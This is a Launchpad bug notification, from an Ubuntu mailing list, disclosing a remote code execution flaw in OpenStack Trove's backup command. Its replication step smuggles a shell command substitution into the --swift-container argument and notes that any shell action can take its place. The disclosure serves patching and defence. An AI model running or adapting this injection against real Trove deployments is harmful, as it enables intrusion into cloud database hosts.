[Bug 2028680] [NEW] Remote code execution: Trove backup

Corey Bryant 2028680 at bugs.launchpad.net
Tue Jul 25 15:07:23 UTC 2023


Public bug reported:

Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004

An external security audit by Adam Bell, CyberCX New Zealand (conducted
for Catalyst Cloud) has identified a Remote Code Execution security
issue in Trove.

During a Trove instance backup command, it is possible to pass through
extra arguments via guestagent to docker, and utilize a subprocess shell
within backup python code to perform a Remote Code Execution within the
Trove backup container.

Replication steps:

1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1

Validation of the RCE can be observed from within the Trove VM:

root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
root at rce-db1:~# ls -l rce_successful.txt 
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt

The executed touch command above can be replaced with any shell actions,
including apt.

** Affects: openstack-trove (Ubuntu)
     Importance: High
         Status: Fix Released

** Affects: openstack-trove (Ubuntu Jammy)
     Importance: High
         Status: Triaged

** Affects: openstack-trove (Ubuntu Lunar)
     Importance: High
         Status: Fix Released

** Affects: openstack-trove (Ubuntu Mantic)
     Importance: High
         Status: Fix Released

** Also affects: openstack-trove (Ubuntu Mantic)
   Importance: Undecided
       Status: New

** Also affects: openstack-trove (Ubuntu Lunar)
   Importance: Undecided
       Status: New

** Also affects: openstack-trove (Ubuntu Jammy)
   Importance: Undecided
       Status: New

** Changed in: openstack-trove (Ubuntu Lunar)
       Status: New => Fix Released

** Changed in: openstack-trove (Ubuntu Mantic)
       Status: New => Fix Released

** Changed in: openstack-trove (Ubuntu Jammy)
       Status: New => Triaged

** Changed in: openstack-trove (Ubuntu Jammy)
   Importance: Undecided => High

** Changed in: openstack-trove (Ubuntu Lunar)
   Importance: Undecided => High

** Changed in: openstack-trove (Ubuntu Mantic)
   Importance: Undecided => High

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to openstack-trove in Ubuntu.
https://bugs.launchpad.net/bugs/2028680

Title:
  Remote code execution: Trove backup

Status in openstack-trove package in Ubuntu:
  Fix Released
Status in openstack-trove source package in Jammy:
  Triaged
Status in openstack-trove source package in Lunar:
  Fix Released
Status in openstack-trove source package in Mantic:
  Fix Released

Bug description:
  Note: Details taken from
  https://storyboard.openstack.org/#!/story/2010004

  An external security audit by Adam Bell, CyberCX New Zealand
  (conducted for Catalyst Cloud) has identified a Remote Code Execution
  security issue in Trove.

  During a Trove instance backup command, it is possible to pass through
  extra arguments via guestagent to docker, and utilize a subprocess
  shell within backup python code to perform a Remote Code Execution
  within the Trove backup container.

  Replication steps:

  1) Create mysql database instance.
  2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1

  Validation of the RCE can be observed from within the Trove VM:

  root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
  root at rce-db1:~# ls -l rce_successful.txt 
  -rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt

  The executed touch command above can be replaced with any shell
  actions, including apt.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openstack-trove/+bug/2028680/+subscriptions




More information about the Ubuntu-openstack-bugs mailing list